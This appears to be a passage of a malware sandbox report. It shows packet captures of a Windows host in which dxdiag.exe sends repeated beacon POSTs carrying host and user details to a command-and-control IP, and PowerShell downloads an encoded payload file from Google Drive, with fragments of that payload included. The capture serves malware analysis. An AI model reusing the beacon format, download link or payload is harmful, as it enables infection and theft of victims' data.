                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:17.521401882 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:17.521411896 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        27192.168.2.549743137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:48:17.671335936 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:17.676414967 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:20.266655922 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:18 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:20.266674042 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:20.266685963 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        28192.168.2.549744137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:48:20.417524099 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:20.422456026 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:23.061018944 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:20 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:23.061048985 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:23.061062098 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        29192.168.2.549745137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:48:23.212361097 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:48:23.217240095 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:25.861857891 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:48:23 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:48:25.861875057 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:48:25.861886978 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549704142.250.184.2384433032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        2024-10-01 05:46:24 UTC215OUTGET /uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8 HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: drive.google.com
                        Connection: Keep-Alive
                        2024-10-01 05:46:25 UTC1610INHTTP/1.1 303 See Other
                        Content-Type: application/binary
                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                        Pragma: no-cache
                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                        Date: Tue, 01 Oct 2024 05:46:25 GMT
                        Location: https://drive.usercontent.google.com/download?id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8&export=download
                        Strict-Transport-Security: max-age=31536000
                        Cross-Origin-Opener-Policy: same-origin
                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                        Content-Security-Policy: script-src 'nonce-oeymWnFJsxqaNq4m_CHf_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                        Server: ESF
                        Content-Length: 0
                        X-XSS-Protection: 0
                        X-Frame-Options: SAMEORIGIN
                        X-Content-Type-Options: nosniff
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.549705142.250.184.1934433032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        2024-10-01 05:46:25 UTC233OUTGET /download?id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8&export=download HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: drive.usercontent.google.com
                        Connection: Keep-Alive
                        2024-10-01 05:46:28 UTC4858INHTTP/1.1 200 OK
                        Content-Type: application/octet-stream
                        Content-Security-Policy: sandbox
                        Content-Security-Policy: default-src 'none'
                        Content-Security-Policy: frame-ancestors 'none'
                        X-Content-Security-Policy: sandbox
                        Cross-Origin-Opener-Policy: same-origin
                        Cross-Origin-Embedder-Policy: require-corp
                        Cross-Origin-Resource-Policy: same-site
                        X-Content-Type-Options: nosniff
                        Content-Disposition: attachment; filename="Encephaloscope.fla"
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Credentials: false
                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                        Accept-Ranges: bytes
                        Content-Length: 453852
                        Last-Modified: Mon, 30 Sep 2024 07:14:32 GMT
                        X-GUploader-UploadID: AD-8ljseGJFwgkAEuMqXVJQf8tNheOjD30K7styudwwJ6_Qe9l1JzwcmTlS2ITHyTBU_80dJQUD_6VYGbA
                        Date: Tue, 01 Oct 2024 05:46:28 GMT
                        Expires: Tue, 01 Oct 2024 05:46:28 GMT
                        Cache-Control: private, max-age=0
                        X-Goog-Hash: crc32c=7+s5hA==
                        Server: UploadServer
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close
                        2024-10-01 05:46:28 UTC4858INData Raw: 36 77 49 76 2f 65 73 43 36 67 6d 37 7a 2f 45 51 41 48 45 42 6d 33 45 42 6d 77 4e 63 4a 41 54 72 41 71 30 66 63 51 47 62 75 59 75 72 71 30 4a 78 41 5a 74 78 41 5a 75 42 36 54 53 2f 57 30 50 72 41 73 64 6e 36 77 4b 52 4d 6f 48 42 71 52 4f 77 41 4f 73 43 36 4b 76 72 41 73 6a 45 36 77 4c 78 68 65 73 43 34 48 4b 36 7a 45 6e 67 77 2b 73 43 4c 34 44 72 41 6c 5a 47 36 77 4a 51 75 75 73 43 38 55 55 78 79 6e 45 42 6d 33 45 42 6d 34 6b 55 43 2b 73 43 6d 65 7a 72 41 6c 6a 34 30 65 4a 78 41 5a 76 72 41 67 6c 6f 67 38 45 45 36 77 4b 34 43 58 45 42 6d 34 48 35 38 53 43 6b 41 6e 7a 4b 63 51 47 62 63 51 47 62 69 30 51 6b 42 4f 73 43 6b 79 6a 72 41 6a 42 57 69 63 4e 78 41 5a 76 72 41 76 41 4a 67 63 50 54 67 52 63 43 63 51 47 62 63 51 47 62 75 72 4d 43 75 44 74 78 41 5a 74
                        Data Ascii: 6wIv/esC6gm7z/EQAHEBm3EBmwNcJATrAq0fcQGbuYurq0JxAZtxAZuB6TS/W0PrAsdn6wKRMoHBqROwAOsC6KvrAsjE6wLxhesC4HK6zEngw+sCL4DrAlZG6wJQuusC8UUxynEBm3EBm4kUC+sCmezrAlj40eJxAZvrAglog8EE6wK4CXEBm4H58SCkAnzKcQGbcQGbi0QkBOsCkyjrAjBWicNxAZvrAvAJgcPTgRcCcQGbcQGburMCuDtxAZt
                        2024-10-01 05:46:28 UTC4858INData Raw: 4b 4b 55 4c 49 57 6b 33 62 6b 70 64 35 35 73 32 36 64 4d 32 51 53 67 4f 52 48 71 47 4b 69 46 37 67 6c 58 4f 73 72 77 48 52 79 70 72 74 51 64 46 6d 36 51 6f 2b 66 68 68 73 57 6b 36 52 54 6b 75 58 4f 6d 64 31 50 6b 58 36 44 76 42 65 6e 6a 31 4c 59 62 6c 7a 6f 52 2b 47 45 33 6b 67 6d 75 33 5a 49 4a 72 74 32 53 4e 58 55 55 37 4e 4f 62 5a 44 74 37 6f 39 61 67 34 67 62 33 50 47 6e 6a 31 4a 39 52 75 48 4f 79 52 4b 66 50 2b 6a 74 4d 43 58 7a 55 4c 63 75 44 61 64 34 38 58 56 4a 71 2f 65 37 78 59 6b 51 75 71 64 49 75 6e 33 6e 6a 76 65 37 34 62 38 57 32 71 2b 49 67 79 56 54 64 58 39 70 37 6b 32 7a 33 46 42 6b 2f 6f 6a 67 5a 71 39 6c 61 71 66 44 30 71 7a 72 61 79 44 4d 41 74 6f 55 6b 66 68 78 36 49 48 44 63 50 71 41 74 75 62 70 4c 35 4f 61 32 78 44 67 48 71 32 56 36
                        Data Ascii: KKULIWk3bkpd55s26dM2QSgORHqGKiF7glXOsrwHRyprtQdFm6Qo+fhhsWk6RTkuXOmd1PkX6DvBenj1LYblzoR+GE3kgmu3ZIJrt2SNXUU7NObZDt7o9ag4gb3PGnj1J9RuHOyRKfP+jtMCXzULcuDad48XVJq/e7xYkQuqdIun3njve74b8W2q+IgyVTdX9p7k2z3FBk/ojgZq9laqfD0qzrayDMAtoUkfhx6IHDcPqAtubpL5Oa2xDgHq2V6
                        2024-10-01 05:46:28 UTC127INData Raw: 38 34 4e 2f 37 4d 6d 35 39 49 44 56 79 63 6e 64 67 33 62 35 4f 6f 47 44 33 6e 49 6d 79 63 6c 75 76 48 79 31 4d 6d 6e 62 4e 77 31 58 7a 46 6b 54 73 71 78 6d 46 4b 6f 64 52 46 72 6f 58 2f 77 35 33 39 54 59 61 36 53 64 53 5a 6b 6c 2f 79 58 6d 50 6e 64 52 4d 7a 76 67 34 39 69 4d 43 73 52 6f 4e 43 6b 61 2b 4c 73 58 70 33 67 32 45 6f 70 4d 39 36 4d 66 64 50 4e 43 70 31 43 6f 55 72 46
                        Data Ascii: 84N/7Mm59IDVycndg3b5OoGD3nImycluvHy1MmnbNw1XzFkTsqxmFKodRFroX/w539TYa6SdSZkl/yXmPndRMzvg49iMCsRoNCka+LsXp3g2EopM96MfdPNCp1CoUrF
